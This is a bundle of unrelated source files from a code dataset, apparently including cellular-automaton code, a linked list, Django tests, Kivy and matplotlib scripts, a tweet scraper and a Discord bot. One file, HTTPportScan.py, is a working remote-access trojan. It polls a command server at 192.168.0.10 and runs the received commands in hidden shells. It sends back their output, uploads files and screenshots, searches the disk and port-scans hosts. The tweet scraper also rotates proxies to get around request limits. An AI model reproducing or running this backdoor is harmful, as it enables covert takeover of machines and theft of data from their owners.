np.binary_repr(rule, 8)\n \n self.f_dict = {}\n for i in range(8):\n self.f_dict[np.binary_repr(i, 3)] = self.wolfram[7-i]\n \n self.init_dict = {\"0\": [], \"1\":[]}\n for i, value in enumerate(self.wolfram):\n self.init_dict[str(value)].append(np.binary_repr(7-i, 3))\n \n self.next_dict = {}\n for i, value in enumerate(self.wolfram):\n neigh = np.binary_repr(7-i, 3)\n if neigh[0]+ neigh[1]+ str(value) not in self.next_dict:\n self.next_dict[neigh[0]+ neigh[1]+ str(value)] = [str(neigh[2])]\n else:\n self.next_dict[neigh[0]+ neigh[1]+ str(value)].append(str(neigh[2]))\n \n def F_cyclic(self, state):\n n = len(state)\n new_state = \"\"\n for i in range(len(state)):\n new_state += self.f_dict[state[(i-1)%n]+ 
state[i%n]+ state[(i+1)%n]]\n return new_state\n\n\n def preimage_cyclic(self, u):\n n = len(u)\n while n<4:\n u += u \n n = len(u)\n preimages = []\n try:\n potential = [i for i in self.init_dict[u[0]]]\n except:\n return preimages\n while potential:\n a = potential.pop(0)\n if len(a) == len(u):\n if self.f_dict[a[-2] + a[-1] + a[0]] == u[-2] and self.f_dict[a[-1]+a[0]+a[1]] == u[-1]:\n preimages.append(a[1:] + a[0])\n continue\n try:\n nexts = self.next_dict[a[-2]+ a[-1]+ u[(len(a)-2)%n]]\n for i in nexts:\n b = a + i\n if len(b) == len(u):\n if self.f_dict[b[-2] + b[-1] + b[0]] == u[-2] and self.f_dict[b[-1]+b[0]+b[1]] == u[-1]:\n preimages.append(b[1:] + b[0])\n else:\n potential.append(b)\n except:\n continue\n return preimages\n\ndef rotate(strg, n):\n return strg[n:] + strg[:n]\n\ndef F(state, f_dic):\n n = len(state)\n new_state = \"\"\n for i in range(1, len(state)-1):\n new_state += f_dic[state[(i-1)%n] + state[i%n] + state[(i+1)%n]]\n return new_state\n\ndef f(rule):\n wolfram = np.binary_repr(rule, 8)\n f_dic = {}\n for i in range(8):\n f_dic[np.binary_repr(i, 3)] = wolfram[7-i]\n return f_dic\n\n# print(aut.f_dict)\n# u = \"111110001111101011000110011111111101111\"\n# \n# for _ in range(13):\n# preimages = aut.preimage_cyclic(u)\n# print(preimages)\n# if preimages:\n# print(\"pokracuju\")\n# print()\n# u = preimages[0]\n\n\n# for N in range(2, 8):\n# \n# GOE_N = set()\n# f_dic = f(rule)\n# \n# \n# for init in product([\"0\", \"1\"], repeat=3*N):\n# u = \"\".join(i for i in init)\n# if not aut.preimage_cyclic(u):\n# GOE_N.add(u)\n# v = u\n# for _ in range(N-1):\n# v = F(v, f_dic)\n# GOE_N.add(u)\n# size = len(GOE_N)\n# print(f\"{100*(size/2**(3*N))}%, N={3*N}\")\n \n \n \n\n\n\n\"\"\"pripravka pro kombinatoriku pravidla 110 \"\"\"\n# l = 6\n# i = 0\n# for tup in product([\"0\", \"1\"], repeat=l):\n# u = \"\".join(i for i in tup)\n# v = \"0\" + u + \"0\"\n# if \"010\" in v:\n# print(v)\n# i += 1\n# print(i)\n\n\n\n# rule = np.random.choice(RULES)\n# init = np.binary_repr(np.random.randint(10, 800), 20)\n# f_dic = f(rule)\n# print(\"rule: \", rule)\n# print(f(rule))\n# print(init_dict(rule))\n# print(next_dict(rule))\n# u = \"01010101\"\n# preimages = preimage_cyclic(u, init_dict(rule), next_dict(rule), f(rule))\n# print(preimages)\n# \n# for p in preimages:\n# if F_cyclic(p, f_dic) == u:\n# print(\"sedi to\")\n\n","sub_path":"DDLab/preimages.py","file_name":"preimages.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"633106968","text":"# linked list finally implementation\n\nfrom typing import Counter\n\n\nclass Node:\n def __init__(self, element = \"start\" , next = None):\n self.element = element\n self.next = next\n\nclass linked_list:\n def __init__(self):\n self.head = Node()\n\n def append_at_beginning(self, element):\n node = Node(element, self.head.next)\n self.head.next = node\n\n def append_at_end(self, element):\n c_node = self.head\n while c_node.next:\n c_node = c_node.next\n c_node.next = Node(element, None)\n\n def get_length(self):\n cnt = 0\n c_node = self.head\n while c_node:\n cnt += 1\n c_node = c_node.next\n return cnt\n\n def insert_at_specific_index(self, index, element):\n if index < 0 or index > self.get_length():\n print(\"Invalid Index\")\n return\n\n if index == 0:\n self.append_at_beginning(element)\n return\n \n cnt = 0\n c_node = self.head\n while c_node:\n if cnt == index - 1 :\n node = Node(element, c_node.next)\n c_node.next = node\n break\n c_node 
= c_node.next\n cnt += 1\n\n def printing(self):\n if self.head is None:\n print(\"Empty Linked list\")\n return\n\n c_node = self.head\n result = \"\"\n while c_node:\n result = result + str (c_node.element) + ' ---> '\n c_node = c_node.next\n\n print(result)\n\nif __name__ == '__main__' :\n LL = linked_list()\n\n # append at beginning\n LL.append_at_beginning(500)\n LL.append_at_beginning(400)\n LL.printing()\n\n # append at end\n LL.append_at_end(600)\n LL.append_at_end(700)\n LL.printing()\n\n # insert at specific index\n LL.insert_at_specific_index(3, 4352)\n LL.insert_at_specific_index(5, 8097)\n LL.printing()","sub_path":"Ratul_LL_finally_done_05.py","file_name":"Ratul_LL_finally_done_05.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194952019","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.db.models.signals import post_init, post_save\nfrom django.dispatch import Signal\nfrom django.test import TestCase\nfrom tests.myapp.models import Foo, test_handler\nfrom roadies.handlers import handler, Handler\n\ntry:\n import mock\nexcept ImportError:\n from unittest import mock\n\n\ndef async_action(*args):\n pass\n\n\n@handler\ndef do_something(sender, foo, bar, **kwargs):\n \"\"\"Test functional handlers.\"\"\"\n async_action(foo, bar)\n\n\n@handler(post_init, sender='myapp.Foo', dispatch_uid='testing')\ndef do_something_else(sender, instance, **kwargs):\n async_action(instance)\n\n\ntest_signal = Signal(providing_args=['foo', 'bar'])\n\n\nclass HandlerTests(TestCase):\n\n def test_do_something_is_handler_instance(self):\n self.assertIsInstance(do_something, Handler)\n\n def test_connect_no_sender(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertTrue(result)\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertFalse(result)\n\n def test_connect_with_sender_string(self):\n do_something.connect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertTrue(disconnected)\n\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertFalse(disconnected)\n\n def test_do_something_name(self):\n self.assertEqual(do_something.__name__, 'do_something')\n\n def test_do_something_module(self):\n self.assertEqual(do_something.__module__, 'tests.test_handlers')\n\n def test_do_something_doc(self):\n self.assertEqual(do_something.__doc__, 'Test functional handlers.')\n\n def test_do_something_does_something_on_signal(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n with mock.patch('tests.test_handlers.async_action') as func:\n test_signal.send(None, foo=1, bar=2)\n self.assertTrue(func.called)\n func.assert_called_once_with(1, 2)\n\n def test_do_something_else_is_handler(self):\n self.assertIsInstance(do_something_else, Handler)\n\n def test_do_something_else_executed_on_post_init(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n instance = Foo(bar='baz')\n self.assertTrue(func.called)\n func.assert_called_once_with(instance)\n\n def test_calling_the_handler_directly(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n do_something(None, 'foo', 'bar')\n 
self.assertTrue(func.called)\n func.assert_called_once_with('foo', 'bar')\n\n def test_autodiscover_works(self):\n self.assertTrue(\n post_save.disconnect(test_handler, dispatch_uid='test_handler')\n )\n","sub_path":"tests/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"416839433","text":"# -*- coding: utf-8 -*-\nimport mywallet\nimport uuosconfig\n\nfrom kivy.uix.button import Label\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.popup import Popup\nfrom customui import show_reminder\nfrom lang import tr\n\nclass LanguageDialog(Popup):\n def __init__(self, action):\n super(LanguageDialog, self).__init__()\n language = uuosconfig.get_value('language')\n if language is None:\n language = 1\n if language == 0:\n self.index = 0\n self.ids.box_english.active = True\n elif language == 1:\n self.index = 1\n self.ids.box_chinese.active = True\n \n def on_ok(self):\n print(self.index)\n uuosconfig.set_value('language', self.index)\n lang_name = ['en', 'cn'][self.index]\n uuosconfig.app.switch_lang(lang_name)\n uuosconfig.set_value('lang', lang_name)\n self.dismiss()\n\n def on_cancel(self):\n self.dismiss()\n\nclass ThemingDialog(Popup):\n def __init__(self):\n super(ThemingDialog, self).__init__()\n theme = uuosconfig.get_current_theme()\n self.setting = uuosconfig.get_current_theme()\n #self.ids.id_switch_theme.bind(on_press=uuosconfig.app.switch_theme)\n if theme == 'normal':\n self.ids.id_normal.active = True\n self.ids.id_black.active = False\n self.setting = 'normal'\n else:\n self.ids.id_normal.active = False\n self.ids.id_black.active = True\n self.setting = 'black'\n def on_ok(self):\n show_reminder(tr._('Restart App to make the new settings take effect'))\n uuosconfig.set_current_theme(self.setting)\n uuosconfig.app.switch_theme(self.setting)\n #self.change_bgcolor(self.setting)\n #print(uuosconfig.app.theme)\n self.dismiss()\n\nclass SettingScreen(Screen):\n def __init__(self, **kargs):\n super(SettingScreen, self).__init__(**kargs)\n print(uuosconfig.get_current_theme())\n\n def swith_language(self):\n self.dialog = LanguageDialog(self.on_ok)\n self.dialog.ids.id_chinese.text = '中文'\n self.dialog.open()\n\n def check_upgrade(self):\n show_reminder(tr._(\"No upgrade detected\"))\n\n def on_ok(self):\n self.dialog.on_ok()\n self.dialog.dismiss()\n\n def swith_theme(self):\n popup = ThemingDialog()\n popup.open()\n print(uuosconfig.app.theme)\n \n # def set_bgcolor(self,theme):\n # if theme == 'normal':\n # uuosconfig.bg_color = [0.965,0.965,0.965,1]\n # else \n # uuosconfig.bg_color = [0.1176,0.1294,0.1647,1]","sub_path":"settingscreen.py","file_name":"settingscreen.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"334080852","text":"'''\r\nCreated on 10 feb. 
2018\r\n\r\n@author: Sven\r\n'''\r\n\r\nif __name__ == '__main__':\r\n pass\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom matplotlib.lines import Line2D\r\n\r\n# Prepare 100 random numbers to plot\r\nx = np.random.rand(100)\r\ny = np.random.rand(100)\r\n# Prepare 100 random numbers within the range of the number of\r\n# available markers as index\r\n# Each random number will serve as the choice of marker of the\r\n# corresponding coordinates\r\nmarkerindex = np.random.randint(0, len(Line2D.markers), 100)\r\nprint(markerindex)\r\n\r\n# shows possible markers and abbreviation\r\nprint(Line2D.markers)\r\n\r\n# Plot all kinds of available markers at random coordinates\r\n# for each type of marker, plot a point at the above generated\r\n# random coordinates with the marker type\r\nfor k, m in enumerate(Line2D.markers):\r\n i = (markerindex == k)\r\n plt.scatter(x[i], y[i], marker=m)\r\n\r\nplt.show()\r\n\r\n# Prepare 5 lines\r\nx = np.linspace(0,20,10)\r\ny1 = x\r\ny2 = x*2\r\ny3 = x*3\r\ny4 = x*4\r\ny5 = x*5\r\n\r\n\r\n# Plot lines with different marker sizes\r\nplt.plot(x,y1,label = 'x', lw=1, marker='s', ms=5) # square size 10\r\nplt.plot(x,y2,label = '2x', lw=1, marker='^', ms=6) # triangle size 12\r\nplt.plot(x,y3,label = '3x', lw=1, marker='o', ms=5) # circle size 10\r\nplt.plot(x,y4,label = '4x', lw=1, marker='D', ms=4) # diamond size 8\r\nplt.plot(x,y5,label = '5x', lw=1, marker='P', ms=6) # filled plus sign\r\n# size 12\r\n\r\n# get current axes and store it to ax\r\nax = plt.gca()\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"LearnPython/scripts/learnmathplotlib/markers.py","file_name":"markers.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"250162369","text":"# Script to scrape,download and store twitter data into a MongoDB database. The data will be used to feed ML algoirthms and analyze sentiment, spam and other analysis.\n# A modified version of GetOldTweets3 library is used. A .10 sec sleep timer is added to prevent passing normal twitter API request limits. We want to not abuse our calls :).\n# Script run time is dependent on start date to current date but the average time to return 1000 tweets for one day is 40 seconds.\nimport GetOldTweets3 as tweetory\nimport mongoengine as mongo\nfrom tweet import Tweet\nimport datetime\nfrom argparse import ArgumentParser\nfrom dateutil.relativedelta import *\nfrom time import time\nimport requests\nimport random\n\n# stores data into a Schema and saves it into MongoDB. The data is the typical tweet data that can be gathered from scraping like username, likes, retweets etc... Additionally we use Textblob to store the sentiment on the tweet.\n# We're storing sentiment now because even when we do the spam classification we still want the sentiment as extra information. 
Spam is still data!\n\n\ndef store_data(tweet_list):\n for tweet in tweet_list:\n chirp = Tweet()\n chirp.tweet_id = tweet.id\n chirp.permalink = tweet.permalink\n chirp.date = tweet.date\n chirp.username = tweet.username\n chirp.author_id = tweet.author_id\n chirp.tweet = tweet.text\n chirp.retweets = tweet.retweets\n chirp.likes = tweet.favorites\n chirp.comments = tweet.comments\n chirp.mentions = tweet.mentions\n chirp.hashtags = tweet.hashtags\n chirp.cashtags = tweet.cashtags\n chirp.urls = tweet.urls\n try:\n chirp.save()\n except Exception as e:\n print(\"ERROR: \", e)\n continue\n print(\"Saved...\")\n\n\ndef get_proxy(previous=\"\", proxies=[]):\n if not proxies:\n with open(\"proxy-list.txt\") as f:\n proxies = f.read().splitlines()\n\n proxy = proxies[random.randrange(len(proxies))]\n\n if proxy == previous:\n return get_proxy(previous, proxies)\n return proxy\n\n\nif (__name__ == \"__main__\"):\n parser = ArgumentParser(\n description=\"Stores cryptocurrency related tweets into a MongoDB database.\")\n parser.add_argument(\n \"--max\", type=int, help=\"Value for maximum number of tweets to be returned per day. Default 1000.\", default=1000)\n parser.add_argument(\n \"--start\", type=str, help=\"Start date to retrieve tweets from in ISO format YYYY-MM-DD. Default: 2015-01-01\", default=\"2015-01-01\")\n parser.add_argument(\n \"--end\", type=str, help=\"End date to retrieve tweets up to in ISO format YYYY-MM-DD. Default: Today non inclusive.\", default=datetime.date.today().isoformat())\n parser.add_argument(\n \"--keywords\", type=str, help=\"Keywords to be used for searching\", nargs=\"*\",\n default=[\"bitcoin\", \"altcoin\", \"cryptocurrency\", \"blockchain\", \"DAO\", \"dApp\", \"decentralized app\", \"digital asset\", \"cryptotokens\", \"cryptoassets\", \"masternode\", \"proof of stake\", \"proof of work\", \"pump and dump\", \"satoshi\", \"satoshi nakamoto\", \"shilling\", \"solidity\", \"the dao\", \"tokenized\",\n \"digital economy\", \"crypto whale\", \"white paper\", \"airdrop\"])\n parser.add_argument(\n \"--db\", type=str, help=\"Databse name to be used in mongoDB\", default=\"crypto-twitter\")\n\n arguments = parser.parse_args()\n\n print(\"Welcome to Crypto Tweet Historical Database!\")\n\n try:\n print(f\"Connecting to MongoDb server {arguments.db}...\")\n mongo.connect(arguments.db)\n except Exception as e:\n print(\"Failed to connect to MongoDB server...\")\n print(\"ERROR: \", e)\n print(\"Exiting...\")\n exit()\n else:\n print(\"Connected...\")\n\n try:\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n end_date = datetime.datetime.strptime(arguments.end, \"%Y-%m-%d\").date()\n\n except Exception as e:\n print(\"Received start and end dates were not parsable. ISO format(YYYY-MM-DD) required\")\n exit()\n\n date_delta = relativedelta(days=+1)\n max_tweets = arguments.max\n search = arguments.keywords\n proxy = get_proxy()\n\n print(\n f\"Starting tweet retrieval from {start_date.isoformat()} to {end_date.isoformat()}. {max_tweets} per day per search term. For {len(search)} search terms.\")\n print(f\"Using proxy:{proxy}\")\n # For each term loop through each day and pull the historical data by scraping twitter data using GetOldTweets3 library. Requests are throttled via a 0.10 sec sleep so as not to ever exceed standard twitter\n # API limits. Average time to retrieve 1000 tweets per each day is 39sec. 
You can estimate the time in seconds to completion: (start_date - today_date) * 39sec/1000tweet * len(search_terms).\n for term in search:\n while (start_date != end_date):\n since = start_date.isoformat()\n until = (start_date + date_delta).isoformat()\n\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}.\")\n print(f\"Using proxy:{proxy}\")\n\n tweetCriteria = tweetory.manager.TweetCriteria().setQuerySearch(\n term).setSince(since).setUntil(until).setMaxTweets(max_tweets).setLang(\"en\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"Retrying last search..\")\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n\n print(\n f\"Retrieved tweets stored for {term.upper()}...\\nContinuing...\\n\")\n # reset start_date back to original value if not the while loop will not initiate do to a false condition being met.\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"All search terms saved...\\nExiting...\\nGoodbye.\")\n","sub_path":"CreateDatabase/create-db.py","file_name":"create-db.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"638761106","text":"import pygame\n\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self,size,x,y,color):\n super().__init__()\n self.size = size\n self.color = color\n self.image = pygame.Surface( (self.size, self.size))\n self.image.fill(self.color)\n self.rect = self.image.get_rect(topleft=(x, y))\n\n\n","sub_path":"asteroid.py","file_name":"asteroid.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566521495","text":"from loguru import logger\n\nfrom sinric import Sinric\n\napiKey = \"Api Key\"\n\n\ndef power_state(deviceId, state):\n logger.info(\"{} {}\", deviceId, state)\n\n\ndef set_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef adjust_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef set_thermostat_mode(deviceId, value):\n logger.info(\"{} {}\", deviceId, value)\n\n\ncallbacks = {\n \"setPowerState\": power_state,\n \"SetTargetTemperature\": set_target_temp,\n \"AdjustTargetTemperature\": adjust_target_temp,\n \"SetThermostatMode\": set_thermostat_mode,\n}\n\nif __name__ == \"__main__\":\n ob = Sinric(apiKey, callbacks)\n 
ob.handle()\n","sub_path":"python_examples/examples/thermostat_example.py","file_name":"thermostat_example.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"228902979","text":"import re\n\nfrom MessageHandler.Command._Command import _Command\n\n\nclass _Translation(_Command):\n\n def __init__(self):\n super(__class__, self).__init__()\n self._set_translation({})\n\n def _set_translation(self, translation):\n self.__translation = translation\n\n async def _execute(self, message):\n reply = message.content\n for from_word, to_word in self.__translation.items():\n pattern = re.compile(from_word, re.IGNORECASE)\n reply = pattern.sub(to_word, reply)\n return reply\n","sub_path":"MessageHandler/Command/Commands/Translation/_Translation.py","file_name":"_Translation.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"91546305","text":"import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef dailystatistics(finish):\n with open(finish, 'r') as f:\n content = f.readlines()\n\n times = []\n for i in content:\n if not i.startswith(\"/\") and i:\n temp = time.strptime(i.strip(), \"%a %b %d %H:%M:%S CST %Y\")\n a = time.strftime('%F',temp)\n times.append(a)\n\n datas = pd.DatetimeIndex(times)\n jobs = np.ones(len(datas))\n data = pd.DataFrame(data=jobs, index=times, columns=['job'])\n new_jobs = data.groupby(level=0)\n zjw = new_jobs.count()\n zjw.sort_index()['job'].plot()\n plt.show()\n\nif __name__ == \"__main__\":\n # finish = \"/Users/zhangjiawei/Documents/code/researchcode/dailystatistics/finish\"\n dailystatistics(finish=sys.argv[1])\n","sub_path":"dailystatistics/dailyjobplot.py","file_name":"dailyjobplot.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596883984","text":"# Пользователь вводит месяц в виде целого числа от 1 до 12.\r\n# Сообщить к какому времени года относится месяц (зима, весна, лето, осень).\r\n# Напишите решения через list и через dict.\r\n\r\ncalend_list = ['зима', 'зима', 'весна', 'весна', 'весна', 'лето', 'лето', 'лето',\r\n 'осень', 'осень', 'осень', 'зима']\r\ncalend_dict = {1: 'январь', 2: 'февраль', 3: 'март', 4: 'апрель', 5: 'май', 6: 'июнь',\r\n 7: 'июль', 8: 'август', 9: 'сентябрь', 10: 'октябрь', 11: 'ноябрь', 12: 'декабрь'}\r\nwhile True:\r\n month = int(input('Введите номер месяца от 1 до 12: '))\r\n if month < 1 or month > 12:\r\n print('В нашем календаре только 12 месяцев')\r\n else:\r\n break\r\nprint(f'Месяц №{month} - {calend_dict.get(month)}. 
Время года - {calend_list[month - 1]}')\r\n","sub_path":"2.3_calendar.py","file_name":"2.3_calendar.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358799992","text":"#библиотека для Discord бота\n\n\nclass Member(object):\n\t\"\"\"Класс пользователя сервера\"\"\"\n\tdef __init__(self, name, user_id, is_bot, money):\n\t\tself.name = name\n\t\tself.user_id = user_id\n\t\tself.is_bot = is_bot\n\t\tself.money = money\n\tdef __str__(self):\n\t\ttext = self.name + str(self.user_id) + str(self.is_bot) + str(self.money)\n\t\treturn text\n\tdef info(self):\n\t\ttext = \"User name: \" + self.name \\\n\t\t+ \"\\nUser id: \" + str(self.user_id) \\\n\t\t+ \"\\nBot: \" + str(self.is_bot) \\\n\t\t+ \"\\nBalance: \" + str(self.money) + \"\\n\"\n\t\treturn text\n\ndef init(s_name):\n\t\"\"\"Открытие потока чтения/записи\"\"\"\n\ttry:\n\t\tfile = open(s_name, \"rb\")\n\t\treturn file, False\n\texcept:\n\t\tfile = open(s_name, \"wb\")\n\t\treturn file, True\n\ndef get_members(client, server_name):\n\t\"\"\"Получение списка пользователей сервера\"\"\"\n\tservers = client.servers\n\tfor server in servers:\n\t\tif server_name.upper() == server.name.upper():\n\t\t\tmembers = []\n\t\t\tfor member in server.members:\n\t\t\t\tmembers.append(member)\n\t\t\treturn members\n\ndef make_map(members):\n\t\"\"\"Создание словаря пользователей сервера\"\"\"\n\tmember_map = {}\n\tfor member in members:\n\t\tmember_map[str(member.id)] = Member(member.name, member.id, member.bot, 0)\n\treturn member_map\t\n\ndef make_info(members, message):\n\t\"\"\"Создание информационного сообщения\"\"\"\n\ttext = \"```\\n\" + members[str(message.author.id)].info() + \"```\"\n\treturn text\n\ndef add_money(members, message, count):\n\t\"\"\"Добавление денег пользователю\"\"\"\n\tmembers[str(message.author.id)].money += count\n\ndef update(members, pickle, s_name):\n\t\"\"\"Обновление данных\"\"\"\n\tfile = open(s_name, \"wb\")\n\tpickle.dump(members, file)\n\tfile.close()\n\ndef member_add(member, members):\n\t\"\"\"Добавление новго пользователя в словарь\"\"\"\n\tif str(member.id) not in members:\n\t\tmembers[str(member.id)] = Member(member.name, member.id, member.bot, 0)\t\t\n\ndef check(message, s_name):\n\t\"\"\"Проверка сообщения\"\"\"\n\tignorred_id =[\"472644886059810826\", \"487254203467825153\"]\n\ttemp = message.author.id\n\tif message.server.name.upper() == s_name and temp not in ignorred_id:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == \"__main__\":\n\tprint(\"Подключаемый модуль\")","sub_path":"bot_lib.py","file_name":"bot_lib.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"423701732","text":"import requests\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport random\r\nimport socket\r\nfrom PIL import ImageGrab as imagegrab\r\nimport tempfile\r\nimport shutil\r\n\r\ndef subprocess_args(include_stdout=True):\r\n shell = True\r\n if hasattr(subprocess, 'STARTUPINFO'):\r\n si = subprocess.STARTUPINFO()\r\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n env = os.environ\r\n else:\r\n si = None\r\n env = None\r\n if include_stdout:\r\n ret = {'stdout': subprocess.PIPE}\r\n else:\r\n ret = {}\r\n ret.update({'stdin': subprocess.PIPE,\r\n 'stderr': subprocess.PIPE,\r\n 'startupinfo': si,\r\n 'env': env,\r\n 'shell': shell})\r\n return ret\r\n\r\ndef changeDirectory(directory):\r\n os.chdir(directory)\r\n 
requests.post(url = 'http://192.168.0.10',data = ('[+] CWD is ' + os.getcwd()))\r\n\r\ndef grabfile(path):\r\n if os.path.exists(path):\r\n rpath = os.path.realpath(path)\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': rpath}\r\n r = requests.post(url, files=files)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.10',data='[-] Not able to find the file.')\r\n\r\ndef takescreenshot():\r\n dirpath = tempfile.mkdtemp()\r\n path = dirpath + '\\img.jpg'\r\n imagegrab.grab().save(path, \"JPEG\")\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': 'screencap.jpg'}\r\n r = requests.post(url, files=files)\r\n files['file'].close()\r\n shutil.rmtree(dirpath)\r\n\r\ndef search(path,ext):\r\n list = ''\r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n list = list + '\\n' + os.path.join(dirpath,file)\r\n requests.post(url='http://192.168.0.10',data=list)\r\n\r\ndef scanner(ip,ports):\r\n scan_result = ''\r\n for port in ports.split(','):\r\n try:\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n output = sock.connect_ex((ip,int(port)))\r\n\r\n if output == 0:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is open.\\n\"\r\n else:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is closed or the host is not reachable.\\n\"\r\n sock.close()\r\n except Exception as e:\r\n pass\r\n requests.post(url='http://192.168.0.10',data=scan_result)\r\n \r\ndef connect():\r\n while True:\r\n req = requests.get('http://192.168.0.10')\r\n command = req.text\r\n\r\n if \"terminate\" in command:\r\n return 1\r\n elif 'cd ' in command:\r\n code,directory = command.split()\r\n changeDirectory(directory)\r\n elif 'grab' in command:\r\n grab,path = command.split(\" * \")\r\n grabfile(path)\r\n elif 'screencap' in command:\r\n takescreenshot()\r\n elif 'search' in command:\r\n command = command[7:]\r\n print(command)\r\n path,ext = command.split('*')\r\n search(path,ext)\r\n elif 'scan' in command:\r\n command = command[5:]\r\n ip,ports = command.split(':')\r\n scanner(ip,ports)\r\n else:\r\n CMD = subprocess.Popen(command,**subprocess_args(True))\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stderr.read())\r\n\r\n time.sleep(3)\r\n\r\ndef main():\r\n while True:\r\n try:\r\n if connect() == 1:\r\n break\r\n except:\r\n sleep_for = random.randrange(1,10)\r\n time.sleep(sleep_for) #Sleep for a random time between 1 and 10 seconds\r\n #time.sleep(sleep_for * 60) #Sleep for a random time between 1 and 10 minutes\r\n pass\r\n \r\nmain()\r\n","sub_path":"3/HTTPportScan.py","file_name":"HTTPportScan.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"593017022","text":"\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\n\nDOMAIN = 'intranet.iitg.ernet.in/'\nURL = 'http://intranet.iitg.ernet.in/'\nlis=[]\nindex_element = 0 \n\nclass MySpider(BaseSpider):\n name = 'crawler'\n #allowed_domains = [DOMAIN]\n start_urls = [\n URL\n ]\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n for url in hxs.select('//a/@href').extract():\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url= URL + url\n if 'iitg' in url:\n if url not in lis:\n lis.append(url) \n 
